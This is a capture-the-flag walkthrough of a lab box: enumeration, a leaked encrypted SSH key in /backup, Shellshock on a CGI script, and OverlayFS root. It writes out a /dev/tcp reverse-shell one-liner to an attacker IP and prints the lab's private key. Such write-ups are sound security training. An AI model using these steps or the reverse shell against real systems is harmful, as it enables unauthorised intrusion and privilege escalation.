# Tasks
1. user.txt
2. root.txt

# Enumeration
## NMAP 
```nmap
PORT   STATE SERVICE VERSION  
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)  
| ssh-hostkey:    
|   1024 57:20:82:3c:62:aa:8f:42:23:c0:b8:93:99:6f:49:9c (DSA)  
|   2048 4c:40:db:32:64:0d:11:0c:ef:4f:b8:5b:73:9b:c7:6b (RSA)  
|   256 f7:6f:78:d5:83:52:a6:4d:da:21:3c:55:47:b7:2d:6d (ECDSA)  
|_  256 a5:b4:f0:84:b6:a7:8d:eb:0a:9d:3e:74:37:33:65:16 (ED25519)  
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))  
|_http-server-header: Apache/2.4.7 (Ubuntu)  
|_http-title: 0day
```

## Web
- No robots.txt
### Feroxbuster
```bash
301 9l       28w      313c http://10.10.124.240/admin  
301 9l       28w      311c http://10.10.124.240/css  
301 9l       28w      315c http://10.10.124.240/cgi-bin  
301 9l       28w      310c http://10.10.124.240/js  
301 9l       28w      311c http://10.10.124.240/img  
301 9l       28w      315c http://10.10.124.240/uploads  
301 9l       28w      314c http://10.10.124.240/backup  
200 42l      136w     3025c http://10.10.124.240/index.html  
200 31l       37w     1767c http://10.10.124.240/backup/index.html  
200 0l        0w        0c http://10.10.124.240/admin/index.html  
200 0l        0w        0c http://10.10.124.240/uploads/index.html  
200 7l       11w      156c http://10.10.124.240/js/main.js  
301 9l       28w      314c http://10.10.124.240/secret  
200 8l        9w      109c http://10.10.124.240/secret/index.html  
200 1l        7w       38c http://10.10.124.240/robots.txt
```
- `/admin` and `/uploads` does not work.
- `/cgi-bin` returns 403
- `/secret` only reveals a picture of a turtle.
- `/backup ` contains a private key!
```txt
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,82823EE792E75948EE2DE731AF1A0547
T7+F+3ilm5FcFZx24mnrugMY455vI461ziMb4NYk9YJV5uwcrx4QflP2Q2Vk8phx
H4P+PLb79nCc0SrBOPBlB0V3pjLJbf2hKbZazFLtq4FjZq66aLLIr2dRw74MzHSM
FznFI7jsxYFwPUqZtkz5sTcX1afch+IU5/Id4zTTsCO8qqs6qv5QkMXVGs77F2kS
Lafx0mJdcuu/5aR3NjNVtluKZyiXInskXiC01+Ynhkqjl4Iy7fEzn2qZnKKPVPv8
9zlECjERSysbUKYccnFknB1DwuJExD/erGRiLBYOGuMatc+EoagKkGpSZm4FtcIO
IrwxeyChI32vJs9W93PUqHMgCJGXEpY7/INMUQahDf3wnlVhBC10UWH9piIOupNN
SkjSbrIxOgWJhIcpE9BLVUE4ndAMi3t05MY1U0ko7/vvhzndeZcWhVJ3SdcIAx4g
/5D/YqcLtt/tKbLyuyggk23NzuspnbUwZWoo5fvg+jEgRud90s4dDWMEURGdB2Wt
w7uYJFhjijw8tw8WwaPHHQeYtHgrtwhmC/gLj1gxAq532QAgmXGoazXd3IeFRtGB
6+HLDl8VRDz1/4iZhafDC2gihKeWOjmLh83QqKwa4s1XIB6BKPZS/OgyM4RMnN3u
Zmv1rDPL+0yzt6A5BHENXfkNfFWRWQxvKtiGlSLmywPP5OHnv0mzb16QG0Es1FPl
xhVyHt/WKlaVZfTdrJneTn8Uu3vZ82MFf+evbdMPZMx9Xc3Ix7/hFeIxCdoMN4i6
8BoZFQBcoJaOufnLkTC0hHxN7T/t/QvcaIsWSFWdgwwnYFaJncHeEj7d1hnmsAii
b79Dfy384/lnjZMtX1NXIEghzQj5ga8TFnHe8umDNx5Cq5GpYN1BUtfWFYqtkGcn
vzLSJM07RAgqA+SPAY8lCnXe8gN+Nv/9+/+/uiefeFtOmrpDU2kRfr9JhZYx9TkL
wTqOP0XWjqufWNEIXXIpwXFctpZaEQcC40LpbBGTDiVWTQyx8AuI6YOfIt+k64fG
rtfjWPVv3yGOJmiqQOa8/pDGgtNPgnJmFFrBy2d37KzSoNpTlXmeT/drkeTaP6YW
RTz8Ieg+fmVtsgQelZQ44mhy0vE48o92Kxj3uAB6jZp8jxgACpcNBt3isg7H/dq6
oYiTtCJrL3IctTrEuBW8gE37UbSRqTuj9Foy+ynGmNPx5HQeC5aO/GoeSH0FelTk
cQKiDDxHq7mLMJZJO0oqdJfs6Jt/JO4gzdBh3Jt0gBoKnXMVY7P5u8da/4sV+kJE
99x7Dh8YXnj1As2gY+MMQHVuvCpnwRR7XLmK8Fj3TZU+WHK5P6W5fLK7u3MVt1eq
Ezf26lghbnEUn17KKu+VQ6EdIPL150HSks5V+2fC8JTQ1fl3rI9vowPPuC8aNj+Q
Qu5m65A5Urmr8Y01/Wjqn2wC7upxzt6hNBIMbcNrndZkg80feKZ8RD7wE7Exll2h
v3SBMMCT5ZrBFq54ia0ohThQ8hklPqYhdSebkQtU5HPYh+EL/vU1L9PfGv0zipst
gbLFOSPp+GmklnRpihaXaGYXsoKfXvAxGCVIhbaWLAp5AybIiXHyBWsbhbSRMK+P
-----END RSA PRIVATE KEY-----
```
## NIKTO
- Nikto found something suspicious
```bash
+ OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
```
- Let's do some research to find an exploit that works.

# Exploit
- SSH key is protected by password.
- We can use ssh2john for this.
- Password is letmein
- But we still can't login since we don't know the password for any users.
- Now we'll try the shellshock exploit.
- I found this [amazing exploit](https://www.exploit-db.com/exploits/34900)
- We now have a shell as user www-data!
- Now let's create a reverse shell so it's easier for us to move around.
```bash
echo "sh -i >& /dev/tcp/10.17.1.163/9001 0>&1" > test.sh
chmod +x test.sh
```
- Now we can run that and get a reverse shell.

# Privilege Escalation
- We have user ryan.
- We cannot use sudo on `www-data`
- Check out kernel version.
```bash
Linux version 3.13.0-32-generic
```
- If we check out kernel exploits, we see that this kernel is vulnerable to OverlayFS privilege escalation.
- But if we try to compile the exploit, we keep getting this error.
```bash
gcc: error trying to exec 'cc1': execvp: No such file or directory
```
- After doing some research, it says that our PATH variable is a bit weird and we need to set our PATH to the default ubuntu PATH.
```bash
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
```
- Now we can compile our exploit and run it!
- We are now root.